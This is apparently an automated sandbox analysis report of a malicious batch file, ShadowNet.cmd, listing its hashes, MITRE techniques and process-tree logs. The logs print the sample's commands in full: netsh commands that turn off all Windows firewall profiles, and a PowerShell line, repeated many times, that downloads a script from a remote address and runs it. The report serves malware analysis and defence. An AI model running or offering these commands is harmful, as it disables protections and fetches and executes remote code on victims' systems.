f09f1e068a0bf38497bd4e35e8e9b8a640c6ed4bff0c0fe9a86db2befe958f26

Analysis

max time kernel
1046s
max time network
450s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 11:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ShadowNet.cmd
Size

1KB
MD5

eff4712f45313d0756a8f37028e9b155
SHA1

ef57f064430d43a2600df395e50c025ec760fcbe
SHA256

310b1f085793d2f4c0bbfd20f841ba3ead35e2d7d6f454849efb9c80d5c65834
SHA512

2bbd3e1d7f11ee62e7378f1b00d2eae448143d3e894be6a7133e0126e61160b73fc83a5ad8b981212b94d4dcaeeb2d1f4ace0d795d5e0d762e531a7d36f956f7

Score

10^/10

evasion execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http:// 10.127.1.36:65535/script.ps1

Signatures

Modifies Windows Firewall 2 TTPs 7 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

5044 netsh.exe
2268 netsh.exe
2280 netsh.exe
4236 netsh.exe
3012 netsh.exe
1484 netsh.exe
4892 netsh.exe

pid	process
5044	netsh.exe
2268	netsh.exe
2280	netsh.exe
4236	netsh.exe
3012	netsh.exe
1484	netsh.exe
4892	netsh.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4524	powershell.exe
2168	powershell.exe
528	powershell.exe
1752	powershell.exe
528	powershell.exe
444	powershell.exe
3852	powershell.exe
4680	powershell.exe
3168	powershell.exe
2880	powershell.exe
4664	powershell.exe
2064	powershell.exe
4684	powershell.exe
4876	powershell.exe
4524	powershell.exe
800	powershell.exe
2992	powershell.exe
312	powershell.exe
2828	powershell.exe
5096	powershell.exe
1076	powershell.exe
4040	powershell.exe
3444	powershell.exe
2280	powershell.exe
1592	powershell.exe
1372	powershell.exe
1092	powershell.exe
1628	powershell.exe
1140	powershell.exe
2196	powershell.exe
4708	powershell.exe
4396	powershell.exe
2388	powershell.exe
5036	powershell.exe
3128	powershell.exe
4356	powershell.exe
3432	powershell.exe
2256	powershell.exe
1576	powershell.exe
1380	powershell.exe
3996	powershell.exe
3436	powershell.exe
1520	powershell.exe
3872	powershell.exe
1608	powershell.exe
2148	powershell.exe
1152	powershell.exe
2492	powershell.exe
1604	powershell.exe
4840	powershell.exe
2952	powershell.exe
3632	powershell.exe
2692	powershell.exe
3840	powershell.exe
1704	powershell.exe
2456	powershell.exe
208	powershell.exe
1556	powershell.exe
5028	powershell.exe
4264	powershell.exe
1628	powershell.exe
3940	powershell.exe
2556	powershell.exe
1744	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3976	timeout.exe
2256	timeout.exe
1960	timeout.exe
1040	timeout.exe
2860	timeout.exe
4072	timeout.exe
1140	timeout.exe
4948	timeout.exe
1784	timeout.exe
544	timeout.exe
2952	timeout.exe
4440	timeout.exe
4496	timeout.exe
4828	timeout.exe
2016	timeout.exe
3636	timeout.exe
832	timeout.exe
956	timeout.exe
3340	timeout.exe
3772	timeout.exe
2448	timeout.exe
1492	timeout.exe
5028	timeout.exe
4936	timeout.exe
2808	timeout.exe
5044	timeout.exe
1676	timeout.exe
5044	timeout.exe
2828	timeout.exe
2272	timeout.exe
3328	timeout.exe
1516	timeout.exe
3872	timeout.exe
4664	timeout.exe
4768	timeout.exe
4816	timeout.exe
908	timeout.exe
2176	timeout.exe
4544	timeout.exe
4848	timeout.exe
3156	timeout.exe
4900	timeout.exe
1860	timeout.exe
4492	timeout.exe
1092	timeout.exe
824	timeout.exe
5048	timeout.exe
3092	timeout.exe
4200	timeout.exe
2636	timeout.exe
2460	timeout.exe
4840	timeout.exe
3808	timeout.exe
4544	timeout.exe
1124	timeout.exe
4496	timeout.exe
4880	timeout.exe
820	timeout.exe
2972	timeout.exe
4332	timeout.exe
4660	timeout.exe
3372	timeout.exe
1604	timeout.exe
3500	timeout.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

460 ipconfig.exe

pid	process
460	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
4524	powershell.exe
4524	powershell.exe
2196	powershell.exe
2196	powershell.exe
3564	powershell.exe
3564	powershell.exe
3852	powershell.exe
3852	powershell.exe
2568	powershell.exe
2568	powershell.exe
2456	powershell.exe
2456	powershell.exe
4708	powershell.exe
4708	powershell.exe
4328	powershell.exe
4328	powershell.exe
5052	powershell.exe
5052	powershell.exe
1576	powershell.exe
1576	powershell.exe
2024	powershell.exe
2024	powershell.exe
1380	powershell.exe
1380	powershell.exe
676	powershell.exe
676	powershell.exe
3144	powershell.exe
3144	powershell.exe
5096	powershell.exe
5096	powershell.exe
4936	powershell.exe
4936	powershell.exe
4600	powershell.exe
4600	powershell.exe
1520	powershell.exe
1520	powershell.exe
2168	powershell.exe
2168	powershell.exe
4372	powershell.exe
4372	powershell.exe
2020	powershell.exe
2020	powershell.exe
312	powershell.exe
312	powershell.exe
4888	powershell.exe
4888	powershell.exe
528	powershell.exe
528	powershell.exe
3248	powershell.exe
3248	powershell.exe
4680	powershell.exe
4680	powershell.exe
1076	powershell.exe
1076	powershell.exe
2060	powershell.exe
2060	powershell.exe
856	powershell.exe
856	powershell.exe
3104	powershell.exe
3104	powershell.exe
208	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	312	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 4536 wrote to memory of 2256	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 2256	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4236	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 4236	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 3012	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 3012	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 1484	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 1484	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 4892	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 4892	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 5044	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 5044	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 2268	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 2268	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 2280	4536	cmd.exe	netsh.exe
PID 4536 wrote to memory of 2280	4536	cmd.exe	netsh.exe
PID 3452 wrote to memory of 460	3452	cmd.exe	ipconfig.exe
PID 3452 wrote to memory of 460	3452	cmd.exe	ipconfig.exe
PID 4536 wrote to memory of 1476	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1476	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4524	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4524	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 5052	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 5052	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4948	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4948	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 2196	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 2196	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4704	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4704	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1352	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1352	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 3564	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 3564	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 528	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 528	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 376	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 376	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 3852	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 3852	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 1020	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1020	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 800	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 800	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 2568	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 2568	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 672	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 672	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1076	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1076	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 2456	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 2456	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 1516	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1516	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 3036	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 3036	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4708	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4708	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 3340	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 3340	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1080	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 1080	4536	cmd.exe	timeout.exe
PID 4536 wrote to memory of 4328	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 4328	4536	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ShadowNet.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
2⤵
- Modifies Windows Firewall
PID:4236

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
2⤵
- Modifies Windows Firewall
PID:3012

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
2⤵
- Modifies Windows Firewall
PID:1484

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
2⤵
- Modifies Windows Firewall
PID:4892

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
2⤵
- Modifies Windows Firewall
PID:5044

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
2⤵
- Modifies Windows Firewall
PID:2268

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2280

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:5052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4704

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:528

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1020

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:672

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1516

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3340

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2824

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2988

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1192

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4900

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3988

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1860

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2256

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:312

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4188

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2972

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2148

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4916

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:5044

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:960

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http:// 10.127.1.36:65535/script.ps1')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
